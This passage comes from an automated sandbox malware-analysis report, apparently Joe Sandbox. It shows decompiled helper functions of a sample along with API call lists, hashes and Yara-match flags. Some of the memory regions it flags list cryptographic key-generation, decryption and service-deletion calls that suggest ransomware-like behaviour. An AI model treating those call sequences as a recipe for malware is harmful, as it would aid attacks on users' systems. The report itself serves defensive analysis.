                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: NameTranslateValid$CodeEnumLocaleLocalesPageSystem_strcat_strlen
                                                                              • String ID: Norwegian-Nynorsk
                                                                              • API String ID: 4291917928-461349085
                                                                              • Opcode ID: 3274789666a885fe8ed958e051d681dbe9903669499eaa5615e12319ce4fc219
                                                                              • Instruction ID: 00232410e82f7a70b6d046ee000cc258d66e2577bc9921bac4075e365f45b0e2
                                                                              • Opcode Fuzzy Hash: 3274789666a885fe8ed958e051d681dbe9903669499eaa5615e12319ce4fc219
                                                                              • Instruction Fuzzy Hash: B641D5B16C4350BADB30AF219CC1AA637A6AB10745B08463FE60197252D76DE8D5C62F
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041EEE9, Relevance: 9.1, APIs: 6, Instructions: 102COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 60%
                                                                              			E0041EEE9(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t31;
				int _t32;
				int _t44;
				int _t48;
				void* _t49;
				short* _t53;
				void* _t58;
				short* _t59;
				intOrPtr _t62;

				_t49 = __ecx;
				_push(0x18);
				_push(0x44dd08);
				E00412BA4(__ebx, __edi, __esi);
				_t62 =  *0x45a8c0; // 0x0
				if(_t62 == 0) {
					if(GetLocaleInfoW(0, 1, 0, 0) == 0) {
						if(GetLastError() == 0x78) {
							 *0x45a8c0 = 2;
						}
					} else {
						 *0x45a8c0 = 1;
					}
				}
				_t31 =  *0x45a8c0; // 0x0
				if(_t31 == 2 || _t31 == 0) {
					_t32 = GetLocaleInfoA( *(_t58 + 8),  *(_t58 + 0xc),  *(_t58 + 0x10),  *(_t58 + 0x14));
					goto L25;
				} else {
					if(_t31 != 1) {
						L11:
						_t32 = 0;
						L25:
						return E00412BDF(_t32);
					}
					 *(_t58 - 0x1c) = 0;
					 *((intOrPtr*)(_t58 - 0x20)) = 0;
					if( *(_t58 + 0x18) == 0) {
						_t44 =  *0x45a740; // 0x0
						 *(_t58 + 0x18) = _t44;
					}
					_t48 = GetLocaleInfoW( *(_t58 + 8),  *(_t58 + 0xc), 0, 0);
					 *(_t58 - 0x24) = _t48;
					if(_t48 != 0) {
						 *(_t58 - 4) = 0;
						E00412260(_t48 + _t48 + 0x00000003 & 0xfffffffc, _t49);
						 *(_t58 - 0x18) = _t59;
						_t53 = _t59;
						 *(_t58 - 0x28) = _t53;
						 *(_t58 - 4) =  *(_t58 - 4) | 0xffffffff;
						if(_t53 != 0) {
							L16:
							if(GetLocaleInfoW( *(_t58 + 8),  *(_t58 + 0xc), _t53, _t48) != 0) {
								_push(0);
								_push(0);
								if( *(_t58 + 0x14) != 0) {
									_push( *(_t58 + 0x14));
									_push( *(_t58 + 0x10));
								} else {
									_push(0);
									_push(0);
								}
								 *(_t58 - 0x1c) = WideCharToMultiByte( *(_t58 + 0x18), 0, _t53, 0xffffffff, ??, ??, ??, ??);
							}
							if( *((intOrPtr*)(_t58 - 0x20)) != 0) {
								_push(_t53);
								E00412A4D();
							}
							_t32 =  *(_t58 - 0x1c);
							goto L25;
						} else {
							_t53 = E00412247(_t48 + _t48);
							if(_t53 == 0) {
								goto L11;
							}
							 *((intOrPtr*)(_t58 - 0x20)) = 1;
							goto L16;
						}
					} else {
						goto L11;
					}
				}
			}












                                                                              0x0041eee9
                                                                              0x0041eee9
                                                                              0x0041eeeb
                                                                              0x0041eef0
                                                                              0x0041eef7
                                                                              0x0041eefd
                                                                              0x0041ef0e
                                                                              0x0041ef21
                                                                              0x0041ef23
                                                                              0x0041ef23
                                                                              0x0041ef10
                                                                              0x0041ef10
                                                                              0x0041ef10
                                                                              0x0041ef0e
                                                                              0x0041ef2d
                                                                              0x0041ef35
                                                                              0x0041f01a
                                                                              0x00000000
                                                                              0x0041ef43
                                                                              0x0041ef46
                                                                              0x0041ef72
                                                                              0x0041ef72
                                                                              0x0041f020
                                                                              0x0041f028
                                                                              0x0041f028
                                                                              0x0041ef48
                                                                              0x0041ef4b
                                                                              0x0041ef51
                                                                              0x0041ef53
                                                                              0x0041ef58
                                                                              0x0041ef58
                                                                              0x0041ef69
                                                                              0x0041ef6b
                                                                              0x0041ef70
                                                                              0x0041ef79
                                                                              0x0041ef85
                                                                              0x0041ef8a
                                                                              0x0041ef8d
                                                                              0x0041ef8f
                                                                              0x0041ef92
                                                                              0x0041efb1
                                                                              0x0041efca
                                                                              0x0041efda
                                                                              0x0041efdc
                                                                              0x0041efdd
                                                                              0x0041efe1
                                                                              0x0041efe7
                                                                              0x0041efea
                                                                              0x0041efe3
                                                                              0x0041efe3
                                                                              0x0041efe4
                                                                              0x0041efe4
                                                                              0x0041effa
                                                                              0x0041effa
                                                                              0x0041f000
                                                                              0x0041f002
                                                                              0x0041f003
                                                                              0x0041f008
                                                                              0x0041f009
                                                                              0x00000000
                                                                              0x0041efb3
                                                                              0x0041efbd
                                                                              0x0041efc1
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041efc3
                                                                              0x00000000
                                                                              0x0041efc3
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041ef70

                                                                              APIs
                                                                              • GetLocaleInfoW.KERNEL32(00000000,00000001,00000000,00000000,0044DD08,00000018,0041D94B,?,?,?,00000080,00000000,?,?,00000001), ref: 0041EF06
                                                                              • GetLastError.KERNEL32(?,?,00000001), ref: 0041EF18
                                                                              • GetLocaleInfoW.KERNEL32(00000001,?,00000000,00000000,0044DD08,00000018,0041D94B,?,?,?,00000080,00000000,?,?,00000001), ref: 0041EF63
                                                                              • GetLocaleInfoW.KERNEL32(00000001,?,?,00000000,?,?,00000001), ref: 0041EFD2
                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,?,?,00000000,00000000,?,00000000,?,?,00000001), ref: 0041EFF4
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: InfoLocale$ByteCharErrorLastMultiWide
                                                                              • String ID:
                                                                              • API String ID: 97497842-0
                                                                              • Opcode ID: 9d590b2233e44e0d5c768544717aa255f43cdbf16b7c90808ddced4e37fb9822
                                                                              • Instruction ID: e007cc0f8e5f1451c7401b50cf073b8261ccd2464fa2b40d7b1b5eaf5d8a320d
                                                                              • Opcode Fuzzy Hash: 9d590b2233e44e0d5c768544717aa255f43cdbf16b7c90808ddced4e37fb9822
                                                                              • Instruction Fuzzy Hash: 0D31BE35800229BBCF229F52DD449DF7F75FF497A0B100126FC15962A1C77889A2DFA9
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041EDB9, Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 70%
                                                                              			E0041EDB9(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t31;
				int _t32;
				int _t37;
				int _t42;
				void* _t48;
				char* _t54;
				void* _t55;
				char* _t56;
				intOrPtr _t59;

				_t48 = __ecx;
				_push(0x18);
				_push(0x44dcf8);
				E00412BA4(__ebx, __edi, __esi);
				_t59 =  *0x45a8bc; // 0x0
				if(_t59 == 0) {
					if(GetLocaleInfoW(0, 1, 0, 0) == 0) {
						if(GetLastError() == 0x78) {
							 *0x45a8bc = 2;
						}
					} else {
						 *0x45a8bc = 1;
					}
				}
				_t31 =  *0x45a8bc; // 0x0
				if(_t31 != 1) {
					if(_t31 == 2 || _t31 == 0) {
						 *(_t55 - 0x1c) = 0;
						 *((intOrPtr*)(_t55 - 0x24)) = 0;
						if( *(_t55 + 0x18) == 0) {
							_t42 =  *0x45a740; // 0x0
							 *(_t55 + 0x18) = _t42;
						}
						_t32 = GetLocaleInfoA( *(_t55 + 8),  *(_t55 + 0xc), 0, 0);
						 *(_t55 - 0x20) = _t32;
						if(_t32 != 0) {
							 *(_t55 - 4) = 0;
							E00412260(_t32 + 0x00000003 & 0xfffffffc, _t48);
							 *(_t55 - 0x18) = _t56;
							_t54 = _t56;
							 *(_t55 - 0x28) = _t54;
							 *(_t55 - 4) =  *(_t55 - 4) | 0xffffffff;
							if(_t54 != 0) {
								L17:
								if(GetLocaleInfoA( *(_t55 + 8),  *(_t55 + 0xc), _t54,  *(_t55 - 0x20)) != 0) {
									if( *(_t55 + 0x14) != 0) {
										_push( *(_t55 + 0x14));
										_push( *(_t55 + 0x10));
									} else {
										_push(0);
										_push(0);
									}
									 *(_t55 - 0x1c) = MultiByteToWideChar( *(_t55 + 0x18), 1, _t54, 0xffffffff, ??, ??);
								}
								if( *((intOrPtr*)(_t55 - 0x24)) != 0) {
									_push(_t54);
									E00412A4D();
								}
								_t37 =  *(_t55 - 0x1c);
								goto L25;
							} else {
								_t54 = E00412247( *(_t55 - 0x20));
								if(_t54 == 0) {
									goto L12;
								}
								 *((intOrPtr*)(_t55 - 0x24)) = 1;
								goto L17;
							}
						} else {
							goto L12;
						}
					} else {
						L12:
						_t37 = 0;
						goto L25;
					}
				} else {
					_t37 = GetLocaleInfoW( *(_t55 + 8),  *(_t55 + 0xc),  *(_t55 + 0x10),  *(_t55 + 0x14));
					L25:
					return E00412BDF(_t37);
				}
			}












                                                                              0x0041edb9
                                                                              0x0041edb9
                                                                              0x0041edbb
                                                                              0x0041edc0
                                                                              0x0041edca
                                                                              0x0041edd0
                                                                              0x0041edde
                                                                              0x0041edf1
                                                                              0x0041edf3
                                                                              0x0041edf3
                                                                              0x0041ede0
                                                                              0x0041ede0
                                                                              0x0041ede0
                                                                              0x0041edde
                                                                              0x0041edfd
                                                                              0x0041ee04
                                                                              0x0041ee20
                                                                              0x0041ee26
                                                                              0x0041ee29
                                                                              0x0041ee2f
                                                                              0x0041ee31
                                                                              0x0041ee36
                                                                              0x0041ee36
                                                                              0x0041ee41
                                                                              0x0041ee47
                                                                              0x0041ee4c
                                                                              0x0041ee55
                                                                              0x0041ee5e
                                                                              0x0041ee63
                                                                              0x0041ee66
                                                                              0x0041ee68
                                                                              0x0041ee6b
                                                                              0x0041ee8a
                                                                              0x0041ee9e
                                                                              0x0041eeb0
                                                                              0x0041eeb5
                                                                              0x0041eebb
                                                                              0x0041eebe
                                                                              0x0041eeb7
                                                                              0x0041eeb7
                                                                              0x0041eeb8
                                                                              0x0041eeb8
                                                                              0x0041eece
                                                                              0x0041eece
                                                                              0x0041eed4
                                                                              0x0041eed6
                                                                              0x0041eed7
                                                                              0x0041eedc
                                                                              0x0041eedd
                                                                              0x00000000
                                                                              0x0041ee8c
                                                                              0x0041ee95
                                                                              0x0041ee99
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041ee9b
                                                                              0x00000000
                                                                              0x0041ee9b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041ee4e
                                                                              0x0041ee4e
                                                                              0x0041ee4e
                                                                              0x00000000
                                                                              0x0041ee4e
                                                                              0x0041ee06
                                                                              0x0041ee12
                                                                              0x0041eee0
                                                                              0x0041eee8
                                                                              0x0041eee8

                                                                              APIs
                                                                              • GetLocaleInfoW.KERNEL32(00000000,00000001,00000000,00000000,0044DCF8,00000018,0041D9FF,?,?,0045A8A0,00000004,00000000,?,?,00000001), ref: 0041EDD6
                                                                              • GetLastError.KERNEL32(?,?,00000001), ref: 0041EDE8
                                                                              • GetLocaleInfoW.KERNEL32(00000001,?,?,?,0044DCF8,00000018,0041D9FF,?,?,0045A8A0,00000004,00000000,?,?,00000001), ref: 0041EE12
                                                                              • GetLocaleInfoA.KERNEL32(00000001,?,00000000,00000000,0044DCF8,00000018,0041D9FF,?,?,0045A8A0,00000004,00000000,?,?,00000001), ref: 0041EE41
                                                                              • GetLocaleInfoA.KERNEL32(00000001,?,?,?,?,?,00000001), ref: 0041EEA8
                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,000000FF,?,?,?,?,?,?,00000001), ref: 0041EEC8
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: InfoLocale$ByteCharErrorLastMultiWide
                                                                              • String ID:
                                                                              • API String ID: 97497842-0
                                                                              • Opcode ID: 200fb1cbaff66e5ce5a989645fd354206ff0890dbd2b156a45fb76902c2de206
                                                                              • Instruction ID: 54b6771861c02535a4a1919487b393c99c77f57161f5eea6cfd01570bb809de6
                                                                              • Opcode Fuzzy Hash: 200fb1cbaff66e5ce5a989645fd354206ff0890dbd2b156a45fb76902c2de206
                                                                              • Instruction Fuzzy Hash: 31318D75800219EFCF229F52DD458EF7FB5FF48350B24012AF825A1260C73989A1DB59
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0040658E, Relevance: 9.1, APIs: 6, Instructions: 59windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 76%
                                                                              			E0040658E(void* __ecx, void* __edx) {
				struct tagRECT _v20;
				int _v100;
				char _v104;
				void* __esi;
				void* __ebp;
				int _t14;
				int _t18;
				int _t19;
				void* _t43;
				void* _t48;

				_t43 = __edx;
				_t48 = __ecx;
				_t14 = IsIconic( *(__ecx + 0x1c));
				_t49 = _t14;
				if(_t14 == 0) {
					return E004244EE(_t48, _t48, __eflags);
				}
				_push(_t48);
				E0042A8EF( &_v104, _t49);
				SendMessageA( *(_t48 + 0x1c), 0x27, _v100, 0);
				_t18 = GetSystemMetrics(0xb);
				_t19 = GetSystemMetrics(0xc);
				GetClientRect( *(_t48 + 0x1c),  &_v20);
				asm("cdq");
				asm("cdq");
				DrawIcon(_v100, _v20.right - _v20.left - _t18 + 1 - _t43 >> 1, _v20.bottom - _v20.top - _t19 + 1 - _t43 >> 1,  *(_t48 + 0x128));
				return E0042A94A( &_v104);
			}













                                                                              0x0040658e
                                                                              0x00406595
                                                                              0x0040659a
                                                                              0x004065a0
                                                                              0x004065a2
                                                                              0x00000000
                                                                              0x00406619
                                                                              0x004065a6
                                                                              0x004065aa
                                                                              0x004065b9
                                                                              0x004065c7
                                                                              0x004065cd
                                                                              0x004065d8
                                                                              0x004065ed
                                                                              0x004065fc
                                                                              0x00406605
                                                                              0x00000000

                                                                              APIs
                                                                              • IsIconic.USER32(?), ref: 0040659A
                                                                                • Part of subcall function 0042A8EF: __EH_prolog.LIBCMT ref: 0042A8F4
                                                                                • Part of subcall function 0042A8EF: BeginPaint.USER32(?,?,?,?,0042450F), ref: 0042A922
                                                                              • SendMessageA.USER32(?,00000027,?,00000000), ref: 004065B9
                                                                              • GetSystemMetrics.USER32 ref: 004065C7
                                                                              • GetSystemMetrics.USER32 ref: 004065CD
                                                                              • GetClientRect.USER32 ref: 004065D8
                                                                              • DrawIcon.USER32 ref: 00406605
                                                                                • Part of subcall function 0042A94A: __EH_prolog.LIBCMT ref: 0042A94F
                                                                                • Part of subcall function 0042A94A: EndPaint.USER32(?,?,?,?,00424535,?), ref: 0042A96C
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: H_prologMetricsPaintSystem$BeginClientDrawIconIconicMessageRectSend
                                                                              • String ID:
                                                                              • API String ID: 1530917984-0
                                                                              • Opcode ID: d45645eda47242d574d3f8079dd56a37a59257f7d3b303e590f4d4dd3aeec0a0
                                                                              • Instruction ID: 3f53dcad62a1f253b9851b680a0da769e3bd4db854b06cb9bf60b3b287718ca7
                                                                              • Opcode Fuzzy Hash: d45645eda47242d574d3f8079dd56a37a59257f7d3b303e590f4d4dd3aeec0a0
                                                                              • Instruction Fuzzy Hash: 4E11A971600215AFCB10AFB8EE09DAEBBB9EB84300F154535F542E7190CAB1ED15DB04
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 021E28C1, Relevance: 7.9, APIs: 5, Instructions: 416COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.233094123.00000000021E0000.00000040.00000001.sdmp, Offset: 021E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_21e0000_lK8vF3n2e7.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _memset
                                                                              • String ID:
                                                                              • API String ID: 2102423945-0
                                                                              • Opcode ID: 8a404c312162383c4e114af5c0eaaf5718992d507ad079db318c2d82cc2ce286
                                                                              • Instruction ID: e7203c0b89630303176ff47d1de053f25c3675bd2f19058e2d89c9f110bea748
                                                                              • Opcode Fuzzy Hash: 8a404c312162383c4e114af5c0eaaf5718992d507ad079db318c2d82cc2ce286
                                                                              • Instruction Fuzzy Hash: FA022870900A6AEFCF2ACF68CCA46EABB79FF44304F14116AC95787741D732A565CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0222E068, Relevance: 7.6, APIs: 5, Instructions: 74servicestringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,00000000,00000000), ref: 0222E087
                                                                              • lstrlenW.KERNEL32(?), ref: 0222E0BD
                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00010000), ref: 0222E117
                                                                              • DeleteService.ADVAPI32(00000000), ref: 0222E124
                                                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 0222E12B
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.233128075.0000000002221000.00000020.00000001.sdmp, Offset: 02221000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_2221000_lK8vF3n2e7.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Service$CloseDeleteFileHandleModuleNameOpenlstrlen
                                                                              • String ID:
                                                                              • API String ID: 1755434187-0
                                                                              • Opcode ID: 16ed67059dad0cff094ca131a4e2700d4e9a6925b13341eabc6fadd0d9b97885
                                                                              • Instruction ID: 33a5d065b237257349a2ce98d9f36104c03ac93d30a7257464167c901f2c871b
                                                                              • Opcode Fuzzy Hash: 16ed67059dad0cff094ca131a4e2700d4e9a6925b13341eabc6fadd0d9b97885
                                                                              • Instruction Fuzzy Hash: BD216834920236A7CB305A849808ABB7368EF04754F460165FD85E7114EF22AE9AD790
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 02221FFC, Relevance: 7.5, APIs: 5, Instructions: 36encryptionCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 02221F75: CryptAcquireContextW.ADVAPI32(02233BF0,00000000,00000000,00000018,F0000040), ref: 02221F8E
                                                                                • Part of subcall function 02221F75: CryptImportKey.ADVAPI32(?,?,00000000,00000000,02233BF4), ref: 02221FD1
                                                                                • Part of subcall function 02221F75: LocalFree.KERNEL32(?), ref: 02221FDC
                                                                                • Part of subcall function 02221F75: CryptReleaseContext.ADVAPI32(00000000), ref: 02221FED
                                                                              • CryptGenKey.ADVAPI32(0000660E,00000001,02233BF8,02226091,?,0222BC5A,?,?,?,0222BD08), ref: 02222026
                                                                              • CryptCreateHash.ADVAPI32(00008004,00000000,00000000,02233BFC,?,0222BC5A,?,?,?,0222BD08), ref: 02222044
                                                                              • CryptDestroyKey.ADVAPI32(?,0222BC5A,?,?,?,0222BD08), ref: 02222058
                                                                              • CryptDestroyKey.ADVAPI32(?,0222BC5A,?,?,?,0222BD08), ref: 02222064
                                                                              • CryptReleaseContext.ADVAPI32(00000000,?,0222BC5A,?,?,?,0222BD08), ref: 02222072
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.233128075.0000000002221000.00000020.00000001.sdmp, Offset: 02221000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_2221000_lK8vF3n2e7.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Crypt$Context$DestroyRelease$AcquireCreateFreeHashImportLocal
                                                                              • String ID:
                                                                              • API String ID: 4169801620-0
                                                                              • Opcode ID: 60c0505912363c3bb95fd5dffdca14ca79702d776ff06b01c7d9b6dc2b6ed457
                                                                              • Instruction ID: 3045e5ee5cc3ac568a62a990da22dbfa82a4a41aaaed7af66a0309037fce48fe
                                                                              • Opcode Fuzzy Hash: 60c0505912363c3bb95fd5dffdca14ca79702d776ff06b01c7d9b6dc2b6ed457
                                                                              • Instruction Fuzzy Hash: 40F01D347E0302BAEB217FE0BC0FF993A57AB04706F105964B605E40F8DFA382759A44
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042C2AE, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43librarystringCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 91%
                                                                              			E0042C2AE(void* __esi, intOrPtr _a4, char _a8) {
				intOrPtr _v8;
				char _v284;
				intOrPtr _t10;
				void* _t15;
				void* _t20;

				_t20 = __esi;
				_t10 =  *0x457184; // 0xc72e1596
				_v8 = _t10;
				if(_a8 != 0x800) {
					if(GetLocaleInfoA(_a8, 3,  &_a8, 4) != 0) {
						goto L2;
					} else {
					}
				} else {
					lstrcpyA( &_a8, "LOC");
					L2:
					_push(_t20);
					_t15 = E00412F33( &_v284, 0x112, _a4,  &_a8);
					if(_t15 == 0xffffffff || _t15 >= 0x112) {
						_t12 = 0;
					} else {
						_t12 = LoadLibraryA( &_v284);
					}
				}
				return E00412FBB(_t12, _v8);
			}








                                                                              0x0042c2ae
                                                                              0x0042c2be
                                                                              0x0042c2c3
                                                                              0x0042c2c9
                                                                              0x0042c31c
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042c31e
                                                                              0x0042c2cb
                                                                              0x0042c2d1
                                                                              0x0042c2d7
                                                                              0x0042c2d7
                                                                              0x0042c2ec
                                                                              0x0042c2f7
                                                                              0x0042c320
                                                                              0x0042c2fd
                                                                              0x0042c304
                                                                              0x0042c304
                                                                              0x0042c322
                                                                              0x0042c32c

                                                                              APIs
                                                                              • lstrcpyA.KERNEL32(00000800,LOC), ref: 0042C2D1
                                                                              • LoadLibraryA.KERNEL32(?), ref: 0042C304
                                                                              • GetLocaleInfoA.KERNEL32(00000800,00000003,00000800,00000004), ref: 0042C314
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: InfoLibraryLoadLocalelstrcpy
                                                                              • String ID: LOC
                                                                              • API String ID: 864663389-519433814
                                                                              • Opcode ID: 91cc94fd048d3c7b72ac94f4014fedd723e12cd0985f239881296d65061c0b5e
                                                                              • Instruction ID: 6ca95c4da7eb7bf9040ece9e67385bb11b6d4fb20bb8cb2009f8f5314762c45b
                                                                              • Opcode Fuzzy Hash: 91cc94fd048d3c7b72ac94f4014fedd723e12cd0985f239881296d65061c0b5e
                                                                              • Instruction Fuzzy Hash: EF01A731A00118BBDF10DB64ED459DF377CAB00320F808563FD15D2191DB78CE459B9A
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0222215A, Relevance: 6.1, APIs: 4, Instructions: 89encryptionCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CryptDuplicateHash.ADVAPI32(00000000,00000000,?), ref: 022221BE
                                                                              • CryptDecrypt.ADVAPI32(?,00000001,00000000,?,?), ref: 022221EC
                                                                              • CryptVerifySignatureW.ADVAPI32(?,?,00000060,00000000,00000000), ref: 02222208
                                                                              • CryptDestroyHash.ADVAPI32(?), ref: 02222219
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.233128075.0000000002221000.00000020.00000001.sdmp, Offset: 02221000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_2221000_lK8vF3n2e7.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Crypt$Hash$DecryptDestroyDuplicateSignatureVerify
                                                                              • String ID:
                                                                              • API String ID: 1014757615-0
                                                                              • Opcode ID: 405681b59c1266b84a03c7ac9be89f6365f9e0e657a9ec4d224f97d4799d47e8
                                                                              • Instruction ID: dc53fc311bf777f8ef12165063786451a7cdf1a433eb0038e3738781112a3493
                                                                              • Opcode Fuzzy Hash: 405681b59c1266b84a03c7ac9be89f6365f9e0e657a9ec4d224f97d4799d47e8
                                                                              • Instruction Fuzzy Hash: 6E319131B50220FFDB118FA4EC44BA97BAAEF48711F104695E905DB295DBB39E248B50
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 02221F75, Relevance: 6.0, APIs: 4, Instructions: 50encryptionCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CryptAcquireContextW.ADVAPI32(02233BF0,00000000,00000000,00000018,F0000040), ref: 02221F8E
                                                                              • CryptImportKey.ADVAPI32(?,?,00000000,00000000,02233BF4), ref: 02221FD1
                                                                              • LocalFree.KERNEL32(?), ref: 02221FDC
                                                                              • CryptReleaseContext.ADVAPI32(00000000), ref: 02221FED
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.233128075.0000000002221000.00000020.00000001.sdmp, Offset: 02221000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_2221000_lK8vF3n2e7.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Crypt$Context$AcquireFreeImportLocalRelease
                                                                              • String ID:
                                                                              • API String ID: 3512700226-0
                                                                              • Opcode ID: 93c9db05fdf1ae758a279f0ff3555aca9d8862f608f4a4b90fef3e7de8abb835
                                                                              • Instruction ID: 950605382913dd44af07882bae9052c1ed775b5c995cbea10f5cb1182092401e
                                                                              • Opcode Fuzzy Hash: 93c9db05fdf1ae758a279f0ff3555aca9d8862f608f4a4b90fef3e7de8abb835
                                                                              • Instruction Fuzzy Hash: 85017135A90254BBEB219AD2AC0EFDB7B7DE785B41F000055B909A1050DBA14A20DAA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004267FF, Relevance: 6.0, APIs: 4, Instructions: 41keyboardwindowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 88%
                                                                              			E004267FF(void* __ecx) {
				signed int _t5;
				void* _t15;
				void* _t19;

				_t15 = __ecx;
				if((E00428375(__ecx) & 0x40000000) != 0) {
					L6:
					_t5 = E00426363(_t15);
					asm("sbb eax, eax");
					return  ~( ~_t5);
				}
				_t19 = E00408116();
				if(_t19 == 0 || GetKeyState(0x10) < 0 || GetKeyState(0x11) < 0 || GetKeyState(0x12) < 0) {
					goto L6;
				} else {
					SendMessageA( *(_t19 + 0x1c), 0x111, 0xe146, 0);
					return 1;
				}
			}






                                                                              0x00426802
                                                                              0x0042680e
                                                                              0x00426856
                                                                              0x00426858
                                                                              0x0042685f
                                                                              0x00000000
                                                                              0x00426861
                                                                              0x00426815
                                                                              0x00426819
                                                                              0x00000000
                                                                              0x0042683c
                                                                              0x0042684b
                                                                              0x00000000
                                                                              0x00426853

                                                                              APIs
                                                                                • Part of subcall function 00428375: GetWindowLongA.USER32 ref: 00428380
                                                                              • GetKeyState.USER32(00000010), ref: 00426823
